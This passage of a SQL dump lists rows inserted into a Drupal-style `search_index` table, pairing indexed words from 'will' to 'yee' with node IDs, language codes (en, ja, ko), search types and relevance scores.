('will', 82, 'en', 'help_search', 1),
('will', 82, 'ja', 'help_search', 1),
('will', 82, 'ko', 'help_search', 1),
('will', 84, 'en', 'help_search', 1),
('will', 84, 'ja', 'help_search', 1),
('will', 84, 'ko', 'help_search', 1),
('will', 87, 'en', 'node_search', 1),
('will', 88, 'en', 'help_search', 3),
('will', 88, 'ja', 'help_search', 3),
('will', 88, 'ko', 'help_search', 3),
('will', 89, 'en', 'help_search', 4.98224),
('will', 89, 'ja', 'help_search', 4.97402),
('will', 89, 'ko', 'help_search', 4.98224),
('will', 90, 'en', 'help_search', 2),
('will', 90, 'ja', 'help_search', 2),
('will', 90, 'ko', 'help_search', 2),
('will', 92, 'en', 'help_search', 2),
('will', 92, 'ja', 'help_search', 2),
('will', 92, 'ko', 'help_search', 2),
('will', 93, 'en', 'help_search', 1),
('will', 93, 'ja', 'help_search', 1),
('will', 93, 'ko', 'help_search', 1),
('will', 116, 'en', 'node_search', 1),
('will', 126, 'en', 'node_search', 1),
('will', 140, 'en', 'node_search', 1),
('will', 142, 'en', 'node_search', 2),
('will', 154, 'en', 'node_search', 1),
('will', 156, 'en', 'node_search', 2),
('will', 157, 'en', 'node_search', 2),
('will', 162, 'en', 'node_search', 0.889397),
('will', 165, 'en', 'node_search', 1),
('will', 174, 'en', 'node_search', 1),
('will', 176, 'en', 'node_search', 1),
('will', 188, 'en', 'node_search', 1),
('will', 193, 'en', 'node_search', 1),
('will', 195, 'en', 'node_search', 1),
('willing', 3, 'en', 'node_search', 1),
('willing', 3, 'ko', 'node_search', 1),
('willingness', 189, 'en', 'node_search', 1),
('win', 27, 'en', 'node_search', 0.655756),
('win', 70, 'en', 'node_search', 1),
('win', 70, 'ja', 'node_search', 1),
('win', 73, 'en', 'node_search', 1),
('win', 73, 'ja', 'node_search', 1),
('win', 88, 'en', 'node_search', 2),
('win', 88, 'ja', 'node_search', 1),
('win', 97, 'en', 'node_search', 2),
('win', 97, 'ja', 'node_search', 2),
('win', 111, 'en', 'node_search', 2),
('win', 111, 'ja', 'node_search', 2),
('win', 130, 'en', 'node_search', 1),
('win', 130, 'ja', 'node_search', 1),
('win', 149, 'en', 'node_search', 1),
('win', 153, 'en', 'node_search', 1),
('win', 153, 'ja', 'node_search', 1),
('win', 164, 'en', 'node_search', 2),
('win', 164, 'ja', 'node_search', 1.75231),
('win', 165, 'en', 'node_search', 1),
('win', 165, 'ja', 'node_search', 1),
('win', 168, 'en', 'node_search', 2),
('win', 168, 'ja', 'node_search', 1.75946),
('win', 175, 'en', 'node_search', 4),
('win', 175, 'ja', 'node_search', 3.53844),
('win', 196, 'en', 'node_search', 12),
('win', 196, 'ja', 'node_search', 8.37921),
('wish', 25, 'en', 'help_search', 1),
('wish', 25, 'ja', 'help_search', 1),
('wish', 26, 'en', 'help_search', 1),
('wish', 26, 'ja', 'help_search', 1),
('wish', 26, 'ko', 'help_search', 1),
('wish', 68, 'en', 'help_search', 0.816452),
('wish', 68, 'ja', 'help_search', 0.816452),
('wish', 68, 'ko', 'help_search', 0.816452),
('wish', 80, 'en', 'node_search', 1),
('wish', 154, 'en', 'node_search', 1),
('wish', 155, 'en', 'node_search', 2),
('wish', 160, 'en', 'node_search', 1),
('wish', 161, 'en', 'node_search', 1),
('wish', 165, 'en', 'node_search', 1),
('wish', 166, 'en', 'node_search', 1),
('wish', 167, 'en', 'node_search', 1),
('wish', 168, 'en', 'node_search', 1),
('wish', 169, 'en', 'node_search', 1),
('wish', 170, 'en', 'node_search', 1),
('wish', 171, 'en', 'node_search', 1),
('wish', 173, 'en', 'node_search', 1),
('wish', 174, 'en', 'node_search', 1),
('wish', 175, 'en', 'node_search', 1),
('wish', 176, 'en', 'node_search', 1),
('wish', 177, 'en', 'node_search', 1),
('wish', 178, 'en', 'node_search', 1),
('wish', 179, 'en', 'node_search', 1),
('wish', 180, 'en', 'node_search', 1),
('wish', 181, 'en', 'node_search', 1),
('wish', 183, 'en', 'node_search', 1),
('wish', 184, 'en', 'node_search', 1),
('wish', 185, 'en', 'node_search', 1),
('wish', 186, 'en', 'node_search', 1),
('wish', 187, 'en', 'node_search', 1),
('wish', 188, 'en', 'node_search', 1),
('wish', 189, 'en', 'node_search', 1),
('wish', 190, 'en', 'node_search', 1),
('wish', 191, 'en', 'node_search', 1),
('wish', 192, 'en', 'node_search', 1),
('wish', 193, 'en', 'node_search', 1),
('wish', 194, 'en', 'node_search', 1),
('wish', 195, 'en', 'node_search', 1),
('wish', 196, 'en', 'node_search', 1),
('wish', 197, 'en', 'node_search', 1);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('wish', 198, 'en', 'node_search', 1),
('wish', 199, 'en', 'node_search', 1),
('wishes', 156, 'en', 'node_search', 1),
('wishes', 157, 'en', 'node_search', 1),
('wishes', 161, 'en', 'node_search', 1),
('wishes', 164, 'en', 'node_search', 1),
('wishes', 166, 'en', 'node_search', 1),
('wishing', 67, 'ja', 'node_search', 31),
('with', 3, 'en', 'node_search', 2),
('with', 3, 'ko', 'node_search', 2),
('with', 6, 'en', 'help_search', 12.363),
('with', 6, 'en', 'node_search', 28),
('with', 6, 'ja', 'help_search', 12.363),
('with', 6, 'ko', 'help_search', 12.363),
('with', 7, 'en', 'help_search', 2.97286),
('with', 7, 'en', 'node_search', 2),
('with', 7, 'ja', 'help_search', 2.97286),
('with', 7, 'ko', 'help_search', 2.97286),
('with', 7, 'ko', 'node_search', 2),
('with', 8, 'en', 'help_search', 1),
('with', 8, 'ja', 'help_search', 1),
('with', 8, 'ko', 'help_search', 1),
('with', 10, 'en', 'help_search', 1),
('with', 10, 'ja', 'help_search', 1),
('with', 10, 'ko', 'help_search', 1),
('with', 11, 'en', 'help_search', 1),
('with', 11, 'ja', 'help_search', 1),
('with', 11, 'ko', 'help_search', 1),
('with', 19, 'en', 'help_search', 1),
('with', 19, 'en', 'node_search', 3),
('with', 19, 'ja', 'help_search', 1),
('with', 19, 'ko', 'help_search', 1),
('with', 19, 'ko', 'node_search', 3),
('with', 20, 'en', 'help_search', 1),
('with', 20, 'ja', 'help_search', 1),
('with', 20, 'ko', 'help_search', 1),
('with', 22, 'en', 'help_search', 3),
('with', 22, 'ja', 'help_search', 3),
('with', 22, 'ko', 'help_search', 3),
('with', 23, 'en', 'node_search', 2.70535),
('with', 24, 'en', 'help_search', 1),
('with', 24, 'en', 'node_search', 10.9461),
('with', 24, 'ja', 'help_search', 1),
('with', 24, 'ko', 'help_search', 1),
('with', 25, 'en', 'node_search', 2),
('with', 26, 'en', 'node_search', 2),
('with', 27, 'en', 'help_search', 1),
('with', 27, 'en', 'node_search', 5.93347),
('with', 27, 'ja', 'help_search', 1),
('with', 27, 'ko', 'help_search', 1),
('with', 28, 'en', 'help_search', 1),
('with', 28, 'en', 'node_search', 3),
('with', 28, 'ja', 'help_search', 1),
('with', 28, 'ko', 'help_search', 1),
('with', 29, 'en', 'help_search', 1),
('with', 29, 'ja', 'help_search', 1),
('with', 29, 'ko', 'help_search', 1),
('with', 30, 'en', 'help_search', 0.757065),
('with', 30, 'ja', 'help_search', 0.757065),
('with', 30, 'ko', 'help_search', 0.757065),
('with', 31, 'en', 'node_search', 0.923838),
('with', 31, 'ja', 'help_search', 8.7836),
('with', 34, 'en', 'help_search', 1),
('with', 34, 'ja', 'help_search', 1),
('with', 34, 'ko', 'help_search', 1),
('with', 35, 'en', 'help_search', 2),
('with', 35, 'ja', 'help_search', 2),
('with', 35, 'ko', 'help_search', 2),
('with', 37, 'en', 'help_search', 1.88882),
('with', 37, 'ja', 'help_search', 1.88882),
('with', 37, 'ko', 'help_search', 1.88882),
('with', 38, 'en', 'help_search', 1),
('with', 38, 'ja', 'help_search', 1),
('with', 38, 'ko', 'help_search', 1),
('with', 39, 'en', 'help_search', 1),
('with', 39, 'ja', 'help_search', 1),
('with', 39, 'ko', 'help_search', 1),
('with', 41, 'en', 'help_search', 45),
('with', 41, 'ja', 'help_search', 45),
('with', 41, 'ko', 'help_search', 45),
('with', 42, 'en', 'help_search', 3),
('with', 42, 'ja', 'help_search', 3),
('with', 42, 'ko', 'help_search', 3),
('with', 43, 'en', 'help_search', 2),
('with', 43, 'ja', 'help_search', 2),
('with', 43, 'ko', 'help_search', 2),
('with', 44, 'en', 'help_search', 1),
('with', 44, 'ja', 'help_search', 1),
('with', 44, 'ko', 'help_search', 1),
('with', 46, 'en', 'help_search', 26.9729),
('with', 46, 'ja', 'help_search', 26.9729),
('with', 46, 'ko', 'help_search', 26.9729),
('with', 54, 'en', 'help_search', 1),
('with', 54, 'ja', 'help_search', 1),
('with', 54, 'ko', 'help_search', 1),
('with', 59, 'en', 'help_search', 2),
('with', 59, 'ja', 'help_search', 2),
('with', 59, 'ko', 'help_search', 2),
('with', 60, 'en', 'help_search', 1),
('with', 60, 'ja', 'help_search', 1),
('with', 60, 'ko', 'help_search', 1),
('with', 61, 'en', 'help_search', 2),
('with', 61, 'ja', 'help_search', 2),
('with', 61, 'ko', 'help_search', 2),
('with', 62, 'en', 'node_search', 3),
('with', 63, 'en', 'help_search', 3),
('with', 63, 'ja', 'help_search', 3),
('with', 63, 'ko', 'help_search', 3),
('with', 64, 'en', 'help_search', 1),
('with', 64, 'ja', 'help_search', 1),
('with', 64, 'ko', 'help_search', 1),
('with', 65, 'en', 'help_search', 1),
('with', 65, 'ja', 'help_search', 1),
('with', 65, 'ko', 'help_search', 1),
('with', 66, 'en', 'node_search', 1),
('with', 67, 'en', 'help_search', 1),
('with', 67, 'ja', 'help_search', 1),
('with', 67, 'ko', 'help_search', 1),
('with', 68, 'en', 'help_search', 3.83051),
('with', 68, 'en', 'node_search', 5),
('with', 68, 'ja', 'help_search', 3.83051),
('with', 68, 'ja', 'node_search', 1),
('with', 68, 'ko', 'help_search', 3.83051),
('with', 69, 'en', 'help_search', 1),
('with', 69, 'en', 'node_search', 2),
('with', 69, 'ja', 'help_search', 1),
('with', 69, 'ko', 'help_search', 1),
('with', 73, 'en', 'help_search', 1),
('with', 73, 'en', 'node_search', 1),
('with', 73, 'ja', 'help_search', 1),
('with', 73, 'ko', 'help_search', 1),
('with', 74, 'en', 'help_search', 2),
('with', 74, 'ja', 'help_search', 2),
('with', 74, 'ko', 'help_search', 2),
('with', 75, 'en', 'help_search', 1),
('with', 75, 'ja', 'help_search', 1),
('with', 75, 'ko', 'help_search', 1),
('with', 79, 'en', 'help_search', 1),
('with', 79, 'ja', 'help_search', 1),
('with', 79, 'ko', 'help_search', 1),
('with', 80, 'en', 'help_search', 1.9381),
('with', 80, 'ja', 'help_search', 1.9381),
('with', 80, 'ko', 'help_search', 1.9381),
('with', 81, 'en', 'help_search', 2),
('with', 81, 'en', 'node_search', 4),
('with', 81, 'ja', 'help_search', 2),
('with', 81, 'ko', 'help_search', 2),
('with', 84, 'en', 'help_search', 1),
('with', 84, 'ja', 'help_search', 1),
('with', 84, 'ko', 'help_search', 1),
('with', 85, 'en', 'help_search', 1),
('with', 85, 'ja', 'help_search', 1),
('with', 85, 'ko', 'help_search', 1),
('with', 86, 'en', 'help_search', 2),
('with', 86, 'ja', 'help_search', 2),
('with', 86, 'ko', 'help_search', 2),
('with', 87, 'en', 'node_search', 1),
('with', 89, 'en', 'help_search', 3),
('with', 89, 'ja', 'help_search', 3),
('with', 89, 'ko', 'help_search', 3),
('with', 91, 'en', 'help_search', 10.6148),
('with', 91, 'ja', 'help_search', 10.572),
('with', 91, 'ko', 'help_search', 10.6148),
('with', 92, 'en', 'help_search', 1),
('with', 92, 'ja', 'help_search', 1),
('with', 92, 'ko', 'help_search', 1),
('with', 93, 'en', 'help_search', 10.3981),
('with', 93, 'ja', 'help_search', 10.3981),
('with', 93, 'ko', 'help_search', 10.3981),
('with', 101, 'en', 'node_search', 1),
('with', 102, 'en', 'node_search', 1),
('with', 111, 'en', 'node_search', 1),
('with', 112, 'en', 'node_search', 1),
('with', 126, 'en', 'node_search', 1),
('with', 133, 'en', 'node_search', 1),
('with', 136, 'en', 'node_search', 1),
('with', 140, 'en', 'node_search', 1),
('with', 142, 'en', 'node_search', 4),
('with', 147, 'en', 'node_search', 7),
('with', 160, 'en', 'node_search', 1),
('with', 162, 'en', 'node_search', 3.89608),
('with', 163, 'en', 'node_search', 2.91323),
('with', 164, 'en', 'node_search', 1),
('with', 174, 'en', 'node_search', 1),
('with', 177, 'en', 'node_search', 1),
('with', 179, 'en', 'node_search', 1),
('with', 187, 'en', 'node_search', 27),
('with', 199, 'en', 'node_search', 1),
('within', 1, 'en', 'help_search', 1),
('within', 1, 'ja', 'help_search', 1),
('within', 1, 'ko', 'help_search', 1),
('within', 3, 'en', 'node_search', 1),
('within', 3, 'ko', 'node_search', 1),
('within', 23, 'en', 'help_search', 0.896076),
('within', 23, 'en', 'node_search', 1),
('within', 23, 'ja', 'help_search', 0.896076),
('within', 23, 'ko', 'help_search', 0.896076),
('within', 28, 'en', 'help_search', 0.997306),
('within', 28, 'ja', 'help_search', 0.997306),
('within', 28, 'ko', 'help_search', 0.997306),
('within', 30, 'en', 'help_search', 1),
('within', 30, 'ja', 'help_search', 1),
('within', 30, 'ko', 'help_search', 1),
('within', 31, 'ja', 'help_search', 2),
('within', 46, 'en', 'help_search', 1),
('within', 46, 'ja', 'help_search', 1),
('within', 46, 'ko', 'help_search', 1),
('within', 150, 'en', 'node_search', 1),
('within', 190, 'en', 'node_search', 1),
('within', 192, 'en', 'node_search', 1),
('within', 193, 'en', 'node_search', 1),
('within', 194, 'en', 'node_search', 1),
('within', 195, 'en', 'node_search', 1),
('within', 199, 'en', 'node_search', 1),
('without', 20, 'en', 'help_search', 1),
('without', 20, 'ja', 'help_search', 1),
('without', 20, 'ko', 'help_search', 1),
('without', 22, 'en', 'help_search', 2),
('without', 22, 'ja', 'help_search', 2),
('without', 22, 'ko', 'help_search', 2),
('without', 56, 'en', 'help_search', 1),
('without', 56, 'ja', 'help_search', 1),
('without', 56, 'ko', 'help_search', 1),
('without', 86, 'en', 'help_search', 1),
('without', 86, 'ja', 'help_search', 1),
('without', 86, 'ko', 'help_search', 1),
('without', 133, 'en', 'node_search', 1),
('without', 135, 'en', 'node_search', 1),
('without', 136, 'en', 'node_search', 1),
('witness', 67, 'ja', 'node_search', 1),
('witness', 135, 'en', 'node_search', 1),
('won', 23, 'en', 'node_search', 1),
('wonderful', 170, 'en', 'node_search', 1),
('wonderful', 183, 'en', 'node_search', 1),
('word', 61, 'en', 'help_search', 1),
('word', 61, 'ja', 'help_search', 1),
('word', 61, 'ko', 'help_search', 1),
('word', 67, 'en', 'help_search', 4),
('word', 67, 'ja', 'help_search', 4),
('word', 67, 'ko', 'help_search', 4),
('word', 68, 'en', 'help_search', 0.96498),
('word', 68, 'ja', 'help_search', 0.96498),
('word', 68, 'ko', 'help_search', 0.96498),
('word', 74, 'en', 'help_search', 1),
('word', 74, 'ja', 'help_search', 1),
('word', 74, 'ko', 'help_search', 1),
('word', 75, 'en', 'help_search', 1),
('word', 75, 'ja', 'help_search', 1),
('word', 75, 'ko', 'help_search', 1),
('words', 67, 'en', 'help_search', 2),
('words', 67, 'ja', 'help_search', 2),
('words', 67, 'ko', 'help_search', 2),
('words', 68, 'en', 'help_search', 0.945829),
('words', 68, 'ja', 'help_search', 0.945829),
('words', 68, 'ko', 'help_search', 0.945829),
('work', 5, 'en', 'node_search', 45),
('work', 5, 'ko', 'node_search', 45),
('work', 7, 'en', 'node_search', 2),
('work', 7, 'ko', 'node_search', 2),
('work', 8, 'en', 'node_search', 27),
('work', 10, 'en', 'node_search', 28),
('work', 10, 'ko', 'node_search', 28),
('work', 11, 'en', 'help_search', 1),
('work', 11, 'ja', 'help_search', 1),
('work', 11, 'ko', 'help_search', 1),
('work', 18, 'en', 'node_search', 29),
('work', 18, 'ko', 'node_search', 29),
('work', 23, 'en', 'node_search', 2.61925),
('work', 24, 'en', 'node_search', 6.88101),
('work', 24, 'ko', 'node_search', 1),
('work', 26, 'en', 'node_search', 1),
('work', 27, 'en', 'node_search', 0.923838),
('work', 30, 'en', 'node_search', 29),
('work', 31, 'en', 'node_search', 29.7861),
('work', 61, 'en', 'help_search', 0.976851),
('work', 61, 'ja', 'help_search', 0.976851),
('work', 61, 'ko', 'help_search', 0.976851),
('work', 67, 'ja', 'node_search', 2),
('work', 69, 'en', 'node_search', 3),
('work', 77, 'en', 'node_search', 16),
('work', 80, 'en', 'node_search', 1),
('work', 87, 'en', 'node_search', 12),
('work', 89, 'en', 'help_search', 1),
('work', 89, 'ja', 'help_search', 1),
('work', 89, 'ko', 'help_search', 1),
('work', 115, 'en', 'node_search', 1),
('work', 120, 'en', 'node_search', 1),
('work', 134, 'en', 'node_search', 1),
('work', 137, 'en', 'node_search', 1),
('work', 139, 'en', 'node_search', 1),
('work', 140, 'en', 'node_search', 1),
('work', 143, 'en', 'node_search', 1),
('work', 144, 'en', 'node_search', 1),
('work', 147, 'en', 'node_search', 7),
('work', 155, 'en', 'node_search', 2),
('work', 156, 'en', 'node_search', 1),
('work', 157, 'en', 'node_search', 1),
('work', 162, 'en', 'node_search', 1),
('work', 170, 'en', 'node_search', 1),
('work', 173, 'en', 'node_search', 1),
('work', 175, 'en', 'node_search', 1),
('work', 177, 'en', 'node_search', 1),
('work', 178, 'en', 'node_search', 1),
('work', 184, 'en', 'node_search', 1),
('work', 185, 'en', 'node_search', 1),
('work', 191, 'en', 'node_search', 27),
('work', 194, 'en', 'node_search', 1),
('work', 198, 'en', 'node_search', 1),
('work', 199, 'en', 'node_search', 1),
('worker', 154, 'en', 'node_search', 29),
('worker', 155, 'en', 'node_search', 2),
('worker', 156, 'en', 'node_search', 29),
('worker', 157, 'en', 'node_search', 29),
('worker', 160, 'en', 'node_search', 5),
('worker', 161, 'en', 'node_search', 5),
('worker', 162, 'en', 'node_search', 4),
('worker', 163, 'en', 'node_search', 5),
('worker', 164, 'en', 'node_search', 29),
('worker', 165, 'en', 'node_search', 2),
('worker', 166, 'en', 'node_search', 5),
('worker', 167, 'en', 'node_search', 2),
('worker', 168, 'en', 'node_search', 2),
('worker', 169, 'en', 'node_search', 5),
('worker', 170, 'en', 'node_search', 5),
('worker', 171, 'en', 'node_search', 2),
('worker', 173, 'en', 'node_search', 5),
('worker', 174, 'en', 'node_search', 2),
('worker', 175, 'en', 'node_search', 2),
('worker', 176, 'en', 'node_search', 2),
('worker', 177, 'en', 'node_search', 29),
('worker', 178, 'en', 'node_search', 2),
('worker', 179, 'en', 'node_search', 2),
('worker', 180, 'en', 'node_search', 2),
('worker', 184, 'en', 'node_search', 2),
('worker', 185, 'en', 'node_search', 2),
('worker', 186, 'en', 'node_search', 2),
('worker', 187, 'en', 'node_search', 5),
('worker', 188, 'en', 'node_search', 2),
('worker', 189, 'en', 'node_search', 5),
('worker', 190, 'en', 'node_search', 5),
('worker', 191, 'en', 'node_search', 5),
('worker', 192, 'en', 'node_search', 2),
('worker', 193, 'en', 'node_search', 5),
('worker', 194, 'en', 'node_search', 5),
('worker', 195, 'en', 'node_search', 2),
('worker', 196, 'en', 'node_search', 5),
('worker', 197, 'en', 'node_search', 5),
('worker', 198, 'en', 'node_search', 2),
('worker', 199, 'en', 'node_search', 5),
('workers', 3, 'en', 'node_search', 1.98087),
('workers', 3, 'ko', 'node_search', 1.97286),
('workers', 5, 'en', 'node_search', 28),
('workers', 5, 'ko', 'node_search', 28),
('workers', 7, 'en', 'node_search', 2),
('workers', 7, 'ko', 'node_search', 2),
('workers', 23, 'en', 'node_search', 1.73078),
('workers', 26, 'en', 'node_search', 1),
('workers', 27, 'en', 'node_search', 1.59137),
('workers', 30, 'en', 'node_search', 28),
('workers', 77, 'en', 'node_search', 4),
('workers', 154, 'en', 'node_search', 28),
('workers', 163, 'en', 'node_search', 27),
('workers', 165, 'en', 'node_search', 28),
('workers', 167, 'en', 'node_search', 28),
('workers', 169, 'en', 'node_search', 27),
('workers', 173, 'en', 'node_search', 28),
('workers', 174, 'en', 'node_search', 1),
('workers', 175, 'en', 'node_search', 1),
('workers', 176, 'en', 'node_search', 27),
('workers', 184, 'en', 'node_search', 27),
('workflow', 11, 'en', 'help_search', 1),
('workflow', 11, 'ja', 'help_search', 1),
('workflow', 11, 'ko', 'help_search', 1),
('workflow', 30, 'en', 'help_search', 7.45733),
('workflow', 30, 'ja', 'help_search', 7.45733),
('workflow', 30, 'ko', 'help_search', 7.45733),
('workflow', 81, 'en', 'help_search', 1),
('workflow', 81, 'ja', 'help_search', 1),
('workflow', 81, 'ko', 'help_search', 1),
('working', 6, 'en', 'help_search', 10.4041),
('working', 6, 'ja', 'help_search', 10.4041),
('working', 6, 'ko', 'help_search', 10.4041),
('working', 7, 'en', 'node_search', 2),
('working', 7, 'ko', 'node_search', 2),
('working', 23, 'en', 'node_search', 1),
('working', 30, 'en', 'help_search', 1),
('working', 30, 'ja', 'help_search', 1),
('working', 30, 'ko', 'help_search', 1),
('working', 41, 'en', 'help_search', 45),
('working', 41, 'ja', 'help_search', 45),
('working', 41, 'ko', 'help_search', 45),
('working', 46, 'en', 'help_search', 26),
('working', 46, 'ja', 'help_search', 26),
('working', 46, 'ko', 'help_search', 26),
('working', 77, 'en', 'node_search', 4),
('working', 87, 'en', 'node_search', 28),
('working', 87, 'ja', 'node_search', 27),
('working', 156, 'en', 'node_search', 1),
('working', 157, 'en', 'node_search', 1),
('working', 160, 'en', 'node_search', 1),
('working', 162, 'en', 'node_search', 0.942091),
('working', 174, 'en', 'node_search', 1),
('working', 184, 'en', 'node_search', 1),
('working', 186, 'en', 'node_search', 1),
('working', 190, 'en', 'node_search', 1),
('working', 191, 'en', 'node_search', 1),
('working', 196, 'en', 'node_search', 1),
('working', 197, 'en', 'node_search', 1),
('workonly', 24, 'en', 'node_search', 0.757065),
('workonly', 24, 'ko', 'node_search', 0.742984),
('workplace', 24, 'en', 'node_search', 1.80275),
('workplace', 87, 'en', 'node_search', 1),
('workplace', 136, 'en', 'node_search', 1),
('workplace', 140, 'en', 'node_search', 1),
('workplace', 155, 'en', 'node_search', 1),
('workplace', 188, 'en', 'node_search', 1),
('workplace', 198, 'en', 'node_search', 1),
('workplaces', 3, 'en', 'node_search', 1),
('workplaces', 3, 'ko', 'node_search', 1),
('workplaces', 136, 'en', 'node_search', 1),
('workplaces', 165, 'en', 'node_search', 1),
('workplaces', 167, 'en', 'node_search', 1),
('workplaces', 169, 'en', 'node_search', 1),
('workplaces', 176, 'en', 'node_search', 1),
('works', 24, 'en', 'node_search', 5.72812),
('works', 27, 'en', 'node_search', 2),
('world', 62, 'en', 'node_search', 0.830633),
('worry', 98, 'en', 'node_search', 1),
('would', 3, 'en', 'node_search', 1),
('would', 3, 'ko', 'node_search', 1),
('would', 6, 'en', 'help_search', 1),
('would', 6, 'ja', 'help_search', 1),
('would', 6, 'ko', 'help_search', 1),
('would', 7, 'en', 'help_search', 1),
('would', 7, 'ja', 'help_search', 1),
('would', 7, 'ko', 'help_search', 1),
('would', 22, 'en', 'help_search', 3),
('would', 22, 'ja', 'help_search', 3),
('would', 22, 'ko', 'help_search', 3),
('would', 30, 'en', 'node_search', 1),
('would', 33, 'en', 'help_search', 1),
('would', 33, 'ja', 'help_search', 1),
('would', 33, 'ko', 'help_search', 1),
('would', 39, 'en', 'help_search', 1),
('would', 39, 'ja', 'help_search', 1),
('would', 39, 'ko', 'help_search', 1),
('would', 59, 'en', 'help_search', 1),
('would', 59, 'ja', 'help_search', 1),
('would', 59, 'ko', 'help_search', 1),
('would', 61, 'en', 'help_search', 1),
('would', 61, 'ja', 'help_search', 1),
('would', 61, 'ko', 'help_search', 1),
('would', 64, 'en', 'help_search', 1),
('would', 64, 'ja', 'help_search', 1),
('would', 64, 'ko', 'help_search', 1),
('would', 65, 'en', 'help_search', 1),
('would', 65, 'ja', 'help_search', 1),
('would', 65, 'ko', 'help_search', 1),
('would', 68, 'en', 'help_search', 0.957226),
('would', 68, 'ja', 'help_search', 0.957226),
('would', 68, 'ko', 'help_search', 0.957226),
('would', 70, 'en', 'help_search', 1),
('would', 70, 'ja', 'help_search', 1),
('would', 70, 'ko', 'help_search', 1),
('would', 72, 'en', 'help_search', 0.972861),
('would', 72, 'ja', 'help_search', 0.972861),
('would', 72, 'ko', 'help_search', 0.972861),
('would', 75, 'en', 'help_search', 2),
('would', 75, 'ja', 'help_search', 2),
('would', 75, 'ko', 'help_search', 2),
('would', 89, 'en', 'help_search', 1),
('would', 89, 'ja', 'help_search', 1),
('would', 89, 'ko', 'help_search', 1),
('would', 92, 'en', 'help_search', 1),
('would', 92, 'ja', 'help_search', 1),
('would', 92, 'ko', 'help_search', 1),
('would', 160, 'en', 'node_search', 1),
('wraps', 29, 'en', 'help_search', 1),
('wraps', 29, 'ja', 'help_search', 1),
('wraps', 29, 'ko', 'help_search', 1),
('write', 30, 'en', 'help_search', 0.707906),
('write', 30, 'ja', 'help_search', 0.707906),
('write', 30, 'ko', 'help_search', 0.707906),
('writing', 46, 'en', 'help_search', 1),
('writing', 46, 'ja', 'help_search', 1),
('writing', 46, 'ko', 'help_search', 1),
('written', 6, 'en', 'help_search', 1),
('written', 6, 'ja', 'help_search', 1),
('written', 6, 'ko', 'help_search', 1),
('written', 41, 'en', 'help_search', 1),
('written', 41, 'ja', 'help_search', 1),
('written', 41, 'ko', 'help_search', 1),
('written', 138, 'en', 'node_search', 1),
('wun', 23, 'en', 'node_search', 1),
('wun', 27, 'en', 'node_search', 4.79732),
('wut', 76, 'en', 'node_search', 5),
('wut', 76, 'ja', 'node_search', 5),
('wut', 99, 'en', 'node_search', 2),
('wut', 99, 'ja', 'node_search', 2),
('wwwexamplecom', 65, 'en', 'help_search', 4),
('wwwexamplecom', 65, 'ja', 'help_search', 4),
('wwwexamplecom', 65, 'ko', 'help_search', 4),
('wwwnewcomettradingagencycom', 11, 'en', 'node_search', 1),
('wwwnewcomettradingagencycom', 11, 'ja', 'node_search', 1),
('wwwnewcomettradingagencycom', 11, 'ko', 'node_search', 1),
('wwwnewcomettradingagencycom', 62, 'en', 'node_search', 0.769219),
('wwwnewcomettradingagencycom', 62, 'ja', 'node_search', 0.464545),
('wyne', 173, 'en', 'node_search', 2),
('wyne', 173, 'ja', 'node_search', 2),
('wyne', 180, 'en', 'node_search', 6),
('wyne', 180, 'ja', 'node_search', 3.60014),
('wysiwyg', 23, 'en', 'help_search', 4),
('wysiwyg', 23, 'ja', 'help_search', 4),
('wysiwyg', 23, 'ko', 'help_search', 4),
('xml', 44, 'en', 'help_search', 1),
('xml', 44, 'ja', 'help_search', 1),
('xml', 44, 'ko', 'help_search', 1),
('xray', 31, 'en', 'node_search', 1),
('yadana', 157, 'en', 'node_search', 1),
('yadana', 157, 'ja', 'node_search', 1),
('yadana', 186, 'en', 'node_search', 3),
('yadana', 186, 'ja', 'node_search', 1.76922),
('yamin', 79, 'en', 'node_search', 1),
('yamin', 80, 'en', 'node_search', 5),
('yamin', 80, 'ja', 'node_search', 4.99731),
('yamin', 92, 'en', 'node_search', 1),
('yamin', 92, 'ja', 'node_search', 1),
('yamin', 101, 'en', 'node_search', 28),
('yamin', 101, 'ja', 'node_search', 31),
('yamin', 132, 'en', 'node_search', 28),
('yamin', 132, 'ja', 'node_search', 31),
('yaml', 6, 'en', 'help_search', 0.968904),
('yaml', 6, 'ja', 'help_search', 0.968904),
('yaml', 6, 'ko', 'help_search', 0.968904),
('yaml', 12, 'en', 'help_search', 1),
('yaml', 12, 'ja', 'help_search', 1),
('yaml', 12, 'ko', 'help_search', 1),
('yaml', 15, 'en', 'help_search', 1),
('yaml', 15, 'ja', 'help_search', 1),
('yaml', 15, 'ko', 'help_search', 1),
('yaml', 30, 'en', 'help_search', 3.56669),
('yaml', 30, 'ja', 'help_search', 3.56669),
('yaml', 30, 'ko', 'help_search', 3.56669),
('yaml', 46, 'en', 'help_search', 1),
('yaml', 46, 'ja', 'help_search', 1),
('yaml', 46, 'ko', 'help_search', 1),
('yamlformat', 15, 'en', 'help_search', 1),
('yamlformat', 15, 'ja', 'help_search', 1),
('yamlformat', 15, 'ko', 'help_search', 1),
('yandanar', 27, 'en', 'node_search', 0.733888),
('yandar', 149, 'en', 'node_search', 1),
('yangon', 4, 'en', 'node_search', 1),
('yangon', 4, 'ja', 'node_search', 1),
('yangon', 11, 'en', 'node_search', 1),
('yangon', 11, 'ja', 'node_search', 1),
('yangon', 27, 'en', 'node_search', 1),
('yangon', 31, 'en', 'node_search', 0.824901),
('yangon', 95, 'en', 'node_search', 1),
('yati', 102, 'en', 'node_search', 31),
('yati', 102, 'ja', 'node_search', 31),
('yaw', 72, 'en', 'node_search', 1),
('yaw', 72, 'ja', 'node_search', 1),
('yaw', 110, 'en', 'node_search', 28),
('yaw', 110, 'ja', 'node_search', 31),
('year', 3, 'en', 'node_search', 1),
('year', 3, 'ko', 'node_search', 1),
('year', 4, 'en', 'node_search', 1),
('year', 4, 'ja', 'node_search', 1),
('year', 10, 'en', 'node_search', 1),
('year', 10, 'ko', 'node_search', 1),
('year', 27, 'en', 'node_search', 1),
('year', 140, 'en', 'node_search', 1),
('year', 142, 'en', 'node_search', 1),
('years', 7, 'en', 'node_search', 2),
('years', 7, 'ko', 'node_search', 2),
('years', 10, 'en', 'node_search', 1),
('years', 10, 'ko', 'node_search', 1),
('years', 18, 'en', 'node_search', 1),
('years', 18, 'ko', 'node_search', 1),
('years', 23, 'en', 'node_search', 1),
('years', 27, 'en', 'node_search', 0.646943),
('years', 31, 'en', 'node_search', 1.84099),
('years', 62, 'en', 'node_search', 1),
('years', 133, 'en', 'node_search', 1),
('yee', 76, 'en', 'node_search', 5),
('yee', 76, 'ja', 'node_search', 5),
('yee', 99, 'en', 'node_search', 2),
('yee', 99, 'ja', 'node_search', 2),
